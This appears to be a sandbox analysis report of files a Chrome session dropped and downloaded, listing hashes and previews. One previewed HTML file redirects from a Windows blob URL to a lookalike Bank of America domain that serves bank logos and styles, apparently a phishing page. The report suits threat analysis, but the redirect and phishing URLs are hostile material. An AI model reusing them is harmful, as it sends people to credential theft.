                                                                                              Preview:L..................F.@.. ...$+.,.......#}g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2675
                                                                                              Entropy (8bit):4.008379429215123
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8JdhTJZFHaidAKZdA1seh/iZUkAQkqehvy+2:8trw9Q+y
                                                                                              MD5:90E174027163575573B82368F41EC5F9
                                                                                              SHA1:68A0B5FB184014CDD507EE496D0AA0A059F52A67
                                                                                              SHA-256:B33CD31E96F14A974B078C532F14388F9AEB51317060BF2D14DB15D0EF8350B5
                                                                                              SHA-512:2BD6D0B77452AD04A8502A4008A7D892FF97E6D7E5D71717F517BF12C0D7428D1F4BAD6BC1BC7A73ECEFD5BF9E51A725A99AF01AA89A107D2952DB8FF87043AE
                                                                                              Malicious:false
                                                                                              Preview:L..................F.@.. ...$+.,....-..#}g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2689
                                                                                              Entropy (8bit):4.0159650694807265
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8ndhTJZAHaidAKZdA14meh7sFiZUkmgqeh7sVy+BX:8DrHnLy
                                                                                              MD5:F466C1FD88A0DAF41DACDEABA97F1445
                                                                                              SHA1:14944CAB526A78A500C5C3743060ACDAC97E382E
                                                                                              SHA-256:EC3EDC985312B2964C0426F7286675B8F77AF26AB8EC936605FFD7D627411F3A
                                                                                              SHA-512:D2A5BFBC020BB416649536A240927456A0BC37C03E2A59CAAB6905A6D16F67624F3D8C2670EB7450FB9F6F6E9EBDF72BF75F26B2CF3E8B05A52201B36417924C
                                                                                              Malicious:false
                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2677
                                                                                              Entropy (8bit):4.005185840588487
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8adhTJZFHaidAKZdA1TehDiZUkwqehjy+R:8wrrty
                                                                                              MD5:E6C79C6D8B7AA828C3FB480EF3AFBE94
                                                                                              SHA1:49DF94A742ED3D1456D48A1F3344FA8FA7C66FFA
                                                                                              SHA-256:401BB5DF92586E224762EA52B2CCB733795BBD893DB1AEA80E168A0A2B091A9B
                                                                                              SHA-512:2846A8574D7E9F7133F6F0ECBCA572F3923C7C5D222AE15B93951C524BDD3FC592850626E91A346B26B969FC895F65A570ECACCB0C30810A07D803680EA325BF
                                                                                              Malicious:false
                                                                                              Preview:L..................F.@.. ...$+.,.....V.#}g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2677
                                                                                              Entropy (8bit):3.995183334506525
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8cdhTJZFHaidAKZdA1dehBiZUk1W1qehBy+C:8yrL9hy
                                                                                              MD5:6FF7F15D84F2C77EAAEB876A1FCD1447
                                                                                              SHA1:E9206E9F223273051C333D5A383373401DCB4BFE
                                                                                              SHA-256:C295272D8120BC5586E5B39B93C9EA64B5E0C7BBFB2F23E60F89AF5E94A38B0C
                                                                                              SHA-512:ECDB8C7A7A321A1BF46DED327E4CD9653FC365725B2716F994CAD380AA3F6D2293BF1D3BFDC35DA53833BDC79A1F103A44ABD6ABFB11E5044346AF1C26173188
                                                                                              Malicious:false
                                                                                              Preview:L..................F.@.. ...$+.,.....J.#}g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:41:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):2679
                                                                                              Entropy (8bit):4.004816346891291
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:8vdhTJZFHaidAKZdA1duTeehOuTbbiZUk5OjqehOuTbLy+yT+:8rrPTfTbxWOvTbLy7T
                                                                                              MD5:9C23C286A987355F970A8278772CC7A4
                                                                                              SHA1:D2940C04612951C83D6EC3B6C0D8694D24F34621
                                                                                              SHA-256:6F93A95267E24724457706418175391D019CC014A8AA7D84F6C4DA8EC70288C6
                                                                                              SHA-512:7B5170A47C105B17F4195F6934D372C4531BB9F6FCE903A1335F748CFCDAF796CA9A381015291B42DEFCF506DA99B9AF91ADD90FCEC3CA90E788E7DD99C4CAD6
                                                                                              Malicious:false
                                                                                              Preview:L..................F.@.. ...$+.,.......#}g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z!.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z8.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z8.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z8............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z:............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............=.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):129
                                                                                              Entropy (8bit):5.028307540269262
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:UREHjJqhJu+1zWatIyGMHHXuNmAZMHGKqQExLFboCtn:jqhJVCatYMe8AZMcQALhdt
                                                                                              MD5:AC41A68CD186179B08439370E2929B46
                                                                                              SHA1:4527BF86FDA3BA38AA875D2A1E93C48F813D6386
                                                                                              SHA-256:071EA94B8401448101C965E1C39D14786E02C30AEA7D93CFB695A567C83CC1B0
                                                                                              SHA-512:73D7D68F8C62F732A2E2AC8BFC61E3D1F6EBC970FEC4F8A7BE09F76823FEF33E248EAA62C4A2A2A6219CF79B7C7C6B441BB281A892A951D44FE7F6FAA0B44CBD
                                                                                              Malicious:false
                                                                                              URL:https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72
                                                                                              Preview:<head>..<meta http-equiv="Refresh" content="0; url='https://online.access.secure.bankofamerlica.com/?ref=9854tjwe46'" />..</head>
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 1520 x 170, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):39422
                                                                                              Entropy (8bit):6.177610708123144
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:NXE05nUKKL5nCngNR1RJTyKHbja/4078pTuUnMuxaTX3xG7JAejgeqHeJ7CLKr29:535nUMgrDJTXHbcuT7nKRaJ9RCLKaD1
                                                                                              MD5:49BC9262C4A31F1EE2CA2DD5E1DC8588
                                                                                              SHA1:5B145BA3666FFA9EDED453160010567CCC24E8CC
                                                                                              SHA-256:30652CEE5990B3B76F6CBF6F26362BE9254DD62B4C6E6003C1127D1484573787
                                                                                              SHA-512:6E6C30CC2C6A8944948184440A22942962FA2715DFBB9804ADB98377E2C35F73DC8B1A7BDED2991C7CC108F23EDA908E06DAE492169D93E52FC310E59883830B
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...............nA....pHYs.........g..R...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 42 x 22, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):2022
                                                                                              Entropy (8bit):6.718501039531958
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:vhI+kW9Wv2628b9+NNMRlj3BHnbWRqEKXMrMzpwMiAp81H:DkkWv2628bgNqRrHnbWgMwzprVEH
                                                                                              MD5:DEB336030CC20254AF3372FA76D24905
                                                                                              SHA1:36CEF85FB2CF764DDADF34FDCD8ABFB120FC4172
                                                                                              SHA-256:6D608A9D27AE614AA0B16FE920F6A811BF6D4F320A5819B51D3EDB9672912AD9
                                                                                              SHA-512:4F243A7A61B5CC98908CE65BB0D43E373E3837804DD38760CB341616A957C8D9DB3E33D05706D63F269602F6B6ED4C47743B436DFB7A587360A0568088E0E3CD
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...*..........{.....TiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)". xmp:CreateDate="2023-07-12T11:56:32-04:00". xmp:ModifyDate="2023-08-01T11:59:34-04:00". xmp:MetadataDate="2023-08-01T11:59:34-04:00". dc:format="image/png". photoshop:ColorMode="3". xmpMM:InstanceID="xmp.iid:e44b26bf-fcbc-4366-a1b8-af324bc03e89". xmpMM:DocumentID="xmp.did:e44b26bf-fcbc-4366-a1b8-af324bc03e89". xmpMM:OriginalDocumen
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 1520 x 170, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):39422
                                                                                              Entropy (8bit):6.177610708123144
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:NXE05nUKKL5nCngNR1RJTyKHbja/4078pTuUnMuxaTX3xG7JAejgeqHeJ7CLKr29:535nUMgrDJTXHbcuT7nKRaJ9RCLKaD1
                                                                                              MD5:49BC9262C4A31F1EE2CA2DD5E1DC8588
                                                                                              SHA1:5B145BA3666FFA9EDED453160010567CCC24E8CC
                                                                                              SHA-256:30652CEE5990B3B76F6CBF6F26362BE9254DD62B4C6E6003C1127D1484573787
                                                                                              SHA-512:6E6C30CC2C6A8944948184440A22942962FA2715DFBB9804ADB98377E2C35F73DC8B1A7BDED2991C7CC108F23EDA908E06DAE492169D93E52FC310E59883830B
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/BofA_rgb.png
                                                                                              Preview:.PNG........IHDR...............nA....pHYs.........g..R...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                              Category:dropped
                                                                                              Size (bytes):5194
                                                                                              Entropy (8bit):3.976628767895142
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:mD6VAMcWnVRSNUrN3Sky4gNeLSYiJ7iFsAkl2+heNm7iprXbep5DkoG23b+WYYY:p9bSNURZyNNnRJqsAehheImprmDkozYV
                                                                                              MD5:63E737D3544164D2B7F4FBCA416AC807
                                                                                              SHA1:030370AA38715E4C41589633F69D0BFE8255D46C
                                                                                              SHA-256:5FA00D047ACD959697B9D7772C31DCD37BEC33C70C6FBF80AB8316205D1D286D
                                                                                              SHA-512:31EE1BB536C0E50F5568A415EA3308367BFCFD11D2A6F7DFF1C8E3A982F7BE790C240A603CD4C6E187672824B8E5D07646049A28C6A88A7B001EB9A0142F312B
                                                                                              Malicious:false
                                                                                              Preview:<svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83 0 01.74.77 2.25 2.25 0 01.25 1.07 2.26 2.26 0 01-.25 1.08 1.77 1.77 0 01-.74.77 2.55 2.55 0 01-1.28.29H.66v-.72h1.59a1.81 1.81 0 00.87-.19 1.1 1.1 0 00.48-.5 1.73 1.73 0 00.15-.73A1.66 1.66 0 003.6 7a1.1 1.1 0 00-.48-.5 1.86 1.86 0 00-.88-.18H.81v6zm7.74.1a2.29 2.29 0 01-1.2-.32 2.29 2.29 0 01-.8-.91 3.06 3.06 0 01-.28-1.36 3.07 3.07 0 01.28-1.37 2.14 2.14 0 012-1.24 2.14 2.14 0 012 1.24A3.07 3.07 0 0110 9.81a3.06 3.06 0 01-.29 1.36 2.11 2.11 0 01-2 1.23zm0-.69a1.31 1.31 0 00.85-.27 1.6 1.6 0 00.5-.69 2.9 2.9 0 00.16-.94 2.85 2.85 0 00-.16-.94 1.67 1.67 0 00-.5-.71 1.37 1.37 0 00-.85-.26 1.35 1.35 0 00-.85.26 1.67 1.67 0 00-.5.71 2.85 2.85 0 00-.16.94 2.9 2.9 0 00.16.94 1.6 1.6 0 00.5.69 1.29 1.29 0 00.85.27zm4.43.59l-1.54-5h.82l1.08 3
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):92
                                                                                              Entropy (8bit):5.04606831008703
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:mSh1CkO6inoS2IHXybEgEIGmCGkV/:mSh1njSP8Ejr/
                                                                                              MD5:13405D31679814B4148076E79910DA86
                                                                                              SHA1:1065A6739C38136369470F9D5EF305535986E16D
                                                                                              SHA-256:17B2FBB9A228E7FC7CE83A3F52291B89D69D08A86C2F3253DE21FB094605652B
                                                                                              SHA-512:58908336049A67A4B48DBE8E43C8C170FD39387DE2F52A33BA7A67F7F64042CDD4FF7CF45F6D716C3F64FB805019D864DFFA3B89F10B73E23F692C060A2A3D73
                                                                                              Malicious:false
                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmSneAOJNU02BIFDX8fnQUSBQ3Oq1sgEgUNPZkUaxIXCefQqpPOoPi4EgUNlv687RIFDefqYw8SFwlp-RSzKLhtMRIFDdbzFGQSBQ2lkzYk?alt=proto
                                                                                              Preview:ChsKBw1/H50FGgAKBw3Oq1sgGgAKBw09mRRrGgAKEgoHDZb+vO0aAAoHDefqYw8aAAoSCgcN1vMUZBoACgcNpZM2JBoA
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):452054
                                                                                              Entropy (8bit):5.013404989452136
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:grqx/OFPlFGcycoT//maQxdE3eoOwshv9pS3Hfx8L9DkhqFiEUxuegRrscerXuwg:gXFNfvE/x8LkXxq0PuMSJjhk5pfbmsO
                                                                                              MD5:98807EAA5A59B11002059D4F6016E583
                                                                                              SHA1:A452EE263D0D79B504FF1BA324183B784DA90B81
                                                                                              SHA-256:A17627B116A26D370EFFEBB99BE69C76CC3F0842326EEC74D691F4C820FD8E27
                                                                                              SHA-512:98603EB0A2E2FEF2A2BE05377C0F11C12B0E5166987024BB81AE852671BDBB109FD48AE2ED219397E556D0EFF27433D1D9744FD3CB1C1CD45A97F52ECAFE8B0E
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Preview:html{background:#FFF;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img{border:0}address,caption,cite,code,dfn,th,var{font-style:normal;font-weight:normal}li{list-style:none}caption,th{text-align:left}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal}q{quotes:none}q:before,q:after{content:''}abbr,acronym{border:0;font-variant:normal}sub{vertical-align:text-bottom}input,textarea,select{font-family:inherit;font-size:inherit;font-weight:inherit}article,aside,details,figcaption,figure,footer,header,hgroup,nav,section,summary{display:block}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none;height:0}[hidden]{display:none}b,strong{font-weight:bold}dfn{font-style:italic}mark{background:#ff0;color:#000}code,kbd,pre,samp{font-family:monospace,serif;_font-f
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                              Category:downloaded
                                                                                              Size (bytes):5194
                                                                                              Entropy (8bit):3.976628767895142
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:mD6VAMcWnVRSNUrN3Sky4gNeLSYiJ7iFsAkl2+heNm7iprXbep5DkoG23b+WYYY:p9bSNURZyNNnRJqsAehheImprmDkozYV
                                                                                              MD5:63E737D3544164D2B7F4FBCA416AC807
                                                                                              SHA1:030370AA38715E4C41589633F69D0BFE8255D46C
                                                                                              SHA-256:5FA00D047ACD959697B9D7772C31DCD37BEC33C70C6FBF80AB8316205D1D286D
                                                                                              SHA-512:31EE1BB536C0E50F5568A415EA3308367BFCFD11D2A6F7DFF1C8E3A982F7BE790C240A603CD4C6E187672824B8E5D07646049A28C6A88A7B001EB9A0142F312B
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/powered_by_logo.svg
                                                                                              Preview:<svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83 0 01.74.77 2.25 2.25 0 01.25 1.07 2.26 2.26 0 01-.25 1.08 1.77 1.77 0 01-.74.77 2.55 2.55 0 01-1.28.29H.66v-.72h1.59a1.81 1.81 0 00.87-.19 1.1 1.1 0 00.48-.5 1.73 1.73 0 00.15-.73A1.66 1.66 0 003.6 7a1.1 1.1 0 00-.48-.5 1.86 1.86 0 00-.88-.18H.81v6zm7.74.1a2.29 2.29 0 01-1.2-.32 2.29 2.29 0 01-.8-.91 3.06 3.06 0 01-.28-1.36 3.07 3.07 0 01.28-1.37 2.14 2.14 0 012-1.24 2.14 2.14 0 012 1.24A3.07 3.07 0 0110 9.81a3.06 3.06 0 01-.29 1.36 2.11 2.11 0 01-2 1.23zm0-.69a1.31 1.31 0 00.85-.27 1.6 1.6 0 00.5-.69 2.9 2.9 0 00.16-.94 2.85 2.85 0 00-.16-.94 1.67 1.67 0 00-.5-.71 1.37 1.37 0 00-.85-.26 1.35 1.35 0 00-.85.26 1.67 1.67 0 00-.5.71 2.85 2.85 0 00-.16.94 2.9 2.9 0 00.16.94 1.6 1.6 0 00.5.69 1.29 1.29 0 00.85.27zm4.43.59l-1.54-5h.82l1.08 3
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 9 x 135, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):3119
                                                                                              Entropy (8bit):7.88614915155895
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:l/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODWIbhhIs:lSDZ/I09Da01l+gmkyTt6Hk8nTWInIs
